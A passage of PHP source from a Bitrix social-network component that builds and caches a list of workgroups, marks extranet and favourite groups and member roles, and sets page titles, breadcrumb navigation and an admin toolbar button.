						"GROUP_URL" => $pu,
						"GROUP_REQUEST_USER_URL" => CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_GROUP_REQUEST_USER"], array("group_id" => $arGroup["ID"], "user_id" => $arResult["UserRequest"]["ID"])),
						"CAN_INVITE2GROUP" => (($arParams["PAGE"] != "user_groups") ? $arCurrentUserPerms4Group && $arCurrentUserPerms4Group["UserCanInitiate"] : false),
						"FULL" => array(
							"DATE_CREATE_FORMATTED" => date($arParams["DATE_TIME_FORMAT"], MakeTimeStamp($arGroup["DATE_CREATE"], CSite::GetDateFormat("FULL"))),
							"DATE_UPDATE_FORMATTED" => date($arParams["DATE_TIME_FORMAT"], MakeTimeStamp($arGroup["DATE_UPDATE"], CSite::GetDateFormat("FULL"))),
							"DATE_ACTIVITY_FORMATTED" => date($arParams["DATE_TIME_FORMAT"], MakeTimeStamp($arGroup["DATE_ACTIVITY"], CSite::GetDateFormat("FULL")))
						),
						"NUMBER_OF_MEMBERS" => $arGroup["NUMBER_OF_MEMBERS"],
					);

					$arGroupID[] = $arGroup["ID"];
				}

				if (
					!empty($arGroupID)
					&& CModule::IncludeModule("extranet")
					&& !CExtranet::IsExtranetSite()
				)
				{
					$arExtranetGroupID = array();
					$dbGroupTmp = CSocNetGroup::GetList(
						array(),
						array(
							"ID" => $arGroupID,
							"SITE_ID" => CExtranet::GetExtranetSiteID()
						),
						false,
						false,
						array("ID")
					);
					while($arGroupTmp = $dbGroupTmp->Fetch())
					{
						$arExtranetGroupID[] = $arGroupTmp["ID"];
					}

					if (
						count($arExtranetGroupID) > 0 
						&& is_array($arCacheResult["Groups"]["List"])
					)
					{
						foreach($arCacheResult["Groups"]["List"] as $key => $arGroupTmp)
						{
							$arCacheResult["Groups"]["List"][$key]["IS_EXTRANET"] = (in_array($arGroupTmp["GROUP_ID"], $arExtranetGroupID) ? "Y" : "N");
						}
					}
				}

				$arAssets = array();

				$arCss = $APPLICATION->sPath2css;
				$arJs = $APPLICATION->arHeadScripts;

				ob_start();

				$APPLICATION->IncludeComponent(
					"bitrix:main.pagenavigation",
					"",
					array(
						"NAV_OBJECT" => $nav
					),
					false
				);

				$arCacheResult["NAV_STRING"] = ob_get_contents();
				ob_end_clean();

				$arAssets["CSS"] = array_diff($APPLICATION->sPath2css, $arCss);
				$arAssets["JS"] = array_diff($APPLICATION->arHeadScripts, $arJs);

				$arCacheResult["ASSETS"] = $arAssets;
			}
		}
	
		if ($arParams["CACHE_TIME"] > 0)
		{
			if (defined("BX_COMP_MANAGED_CACHE"))
				$CACHE_MANAGER->EndTagCache();

			$groupCache->StartDataCache($arParams["CACHE_TIME"], $cacheId, $cachePath);
			$groupCache->EndDataCache(array("arCacheResult" => $arCacheResult));
		}
	}

	if ($arParams["PAGE"] == "user_projects")
	{
		$arResult["filter_project"] = "Y";
	}

	if (
		$USER->isAuthorized()
		&& isset($arCacheResult['Groups'])
		&& !empty($arCacheResult['Groups']['List'])
	)
	{
		$groupIdList = array();
		foreach($arCacheResult['Groups']['List'] as $group)
		{
			$groupIdList[] = $group['GROUP_ID'];
		}

		if (!empty($groupIdList))
		{
			$favoritesGroupIdList = array();
			$res = \Bitrix\Socialnetwork\WorkgroupFavoritesTable::getList(array(
				'filter' => array(
					'@GROUP_ID' => $groupIdList,
					'USER_ID' => $USER->getId()
				),
				'select' => array('GROUP_ID')
			));
			while($groupFavorites = $res->fetch())
			{
				$favoritesGroupIdList[] = $groupFavorites['GROUP_ID'];
			}

			if (!empty($favoritesGroupIdList))
			{
				foreach($arCacheResult['Groups']['List'] as $key => $group)
				{
					$arCacheResult['Groups']['List'][$key]['IN_FAVORITES'] = (in_array($group['GROUP_ID'], $favoritesGroupIdList) ? 'Y' : 'N');
				}
			}
		}
	}

	$arResult = array_merge($arResult, $arCacheResult);

	if (
		$currentUser
		&& $arParams["PAGE"] == "groups_list"
		&& !empty($arResult["Groups"]["List"])
	)
	{
		$arGroupID = $arRelations = array();
		foreach($arResult["Groups"]["List"] as $arGroup)
		{
			$arGroupID[] = $arGroup["GROUP_ID"];
		}

		if (!empty($arGroupID))
		{
			$res = UserToGroupTable::getList(array(
				'filter' => array(
					'USER_ID' => $arParams["USER_ID"],
					'@GROUP_ID' => $arGroupID
				),
				'select' => array('GROUP_ID', 'ROLE')
			));
			while ($relation = $res->fetch())
			{
				$arRelations[$relation['GROUP_ID']] = $relation;
			}
		}
		foreach($arResult["Groups"]["List"] as $key => $arGroup)
		{
			$arResult["Groups"]["List"][$key]['ROLE'] = (isset($arRelations[$arGroup['GROUP_ID']]) ? $arRelations[$arGroup['GROUP_ID']]['ROLE'] : false);
		}
	}

	if ($arParams["SET_TITLE"] == "Y" || $arParams["SET_NAV_CHAIN"] != "N")
	{
		if (strlen($arParams["NAME_TEMPLATE"]) <= 0)
			$arParams["NAME_TEMPLATE"] = CSite::GetNameFormat();

		$arParams["TITLE_NAME_TEMPLATE"] = str_replace(
			array("#NOBR#", "#/NOBR#"),
			array("", ""),
			$arParams["NAME_TEMPLATE"]
		);
		$bUseLogin = $arParams['SHOW_LOGIN'] != "N" ? true : false;

		if ($arParams["PAGE"] == "group_request_group_search")
		{
			$arTmpUser = array(
				"NAME" => $arResult["UserRequest"]["~NAME"],
				"LAST_NAME" => $arResult["UserRequest"]["~LAST_NAME"],
				"SECOND_NAME" => $arResult["UserRequest"]["~SECOND_NAME"],
				"LOGIN" => $arResult["UserRequest"]["~LOGIN"],
			);
			$strTitleFormatted = CUser::FormatName($arParams['TITLE_NAME_TEMPLATE'], $arTmpUser, $bUseLogin);
		}
		elseif ($arParams["PAGE"] == "user_groups")
		{
			$arTmpUser = array(
				"NAME" => $arResult["User"]["~NAME"],
				"LAST_NAME" => $arResult["User"]["~LAST_NAME"],
				"SECOND_NAME" => $arResult["User"]["~SECOND_NAME"],
				"LOGIN" => $arResult["User"]["~LOGIN"],
			);
			$strTitleFormatted = CUser::FormatName($arParams['TITLE_NAME_TEMPLATE'], $arTmpUser, $bUseLogin);
		}

		if ($arParams["SET_TITLE"] == "Y")
		{
			if ($arResult["USE_UI_FILTER"])
			{
				$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE_COMMON"));
			}
			elseif ($arParams["PAGE"] == "group_request_group_search")
			{
				$APPLICATION->SetTitle($strTitleFormatted.": ".Loc::getMessage("SONET_C36_PAGE_TITLE"));
			}
			elseif ($arParams["PAGE"] == "user_groups")
			{
				if ($currentUser)
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE2_1"));
				}
				else
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE1"));
				}
			}
			elseif ($arParams["PAGE"] == "user_projects")
			{
				if ($currentUser)
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE2_1_PROJECT"));
				}
				else
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE1_PROJECT"));
				}
			}
			elseif (
				$arParams["PAGE"] == "groups_subject" &&
				is_array($arResult["Subject"])
			)
			{
				$APPLICATION->SetTitle($arResult["Subject"]["NAME"]);
			}
			else
			{
				if (isset($arResult["filter_my"]) && $arResult["filter_my"] == "Y")
				{
					$APPLICATION->SetTitle(Loc::getMessage($arResult["filter_project"] == "Y" ? "SONET_C36_PAGE_TITLE2_1_PROJECT" : "SONET_C36_PAGE_TITLE2_1"));
				}
				elseif (isset($arResult["filter_archive"]) && $arResult["filter_archive"] == "Y")
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE2_2"));
				}
				elseif (isset($arResult["filter_extranet"]) && $arResult["filter_extranet"] == "Y")
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE2_3"));
				}
				elseif (isset($arResult["filter_favorites"]) && $arResult["filter_favorites"] == "Y")
				{
					$APPLICATION->SetTitle(Loc::getMessage("SONET_C36_PAGE_TITLE2_4"));
				}
				else
				{
					$APPLICATION->SetTitle(Loc::getMessage($arResult["filter_project"] == "Y" ? "SONET_C36_PAGE_TITLE2_PROJECT" : "SONET_C36_PAGE_TITLE2"));
				}
			}
		}

		if ($arParams["SET_NAV_CHAIN"] != "N")
		{
			if ($arParams["PAGE"] == "group_request_group_search")
			{
				$APPLICATION->AddChainItem($strTitleFormatted, CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_USER"], array("user_id" => $arResult["UserRequest"]["ID"])));
				$APPLICATION->AddChainItem(Loc::getMessage("SONET_C36_PAGE_TITLE"));
			}
			elseif ($arParams["PAGE"] == "user_groups")
			{
				$APPLICATION->AddChainItem($strTitleFormatted, CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_USER"], array("user_id" => $arResult["User"]["ID"])));
				$APPLICATION->AddChainItem(Loc::getMessage("SONET_C36_PAGE_TITLE1"));
			}
			else
			{
				if ($arResult["filter_my"] == "Y")
					$APPLICATION->AddChainItem(Loc::getMessage("SONET_C36_PAGE_TITLE2_1"));
				elseif ($arResult["filter_archive"] == "Y")
					$APPLICATION->AddChainItem(Loc::getMessage("SONET_C36_PAGE_TITLE2_2"));
				elseif ($arResult["filter_extranet"] == "Y")
					$APPLICATION->AddChainItem(Loc::getMessage("SONET_C36_PAGE_TITLE2_3"));
				else
					$APPLICATION->AddChainItem(Loc::getMessage("SONET_C36_PAGE_TITLE2"));
			}
		}
	}

	if (
		!$arResult["USE_UI_FILTER"]
		&& CSocNetUser::IsCurrentUserModuleAdmin()
		&& CModule::IncludeModule('intranet')
	)
	{
		global $INTRANET_TOOLBAR;

		$INTRANET_TOOLBAR->AddButton(array(
			'HREF' => "/bitrix/admin/socnet_subject.php?lang=".LANGUAGE_ID,
			"TEXT" => Loc::getMessage('SONET_C36_EDIT_ENTRIES'),
			'ICON' => 'settings',
			"SORT" => 1000,
		));
	}

}

$this->IncludeComponentTemplate();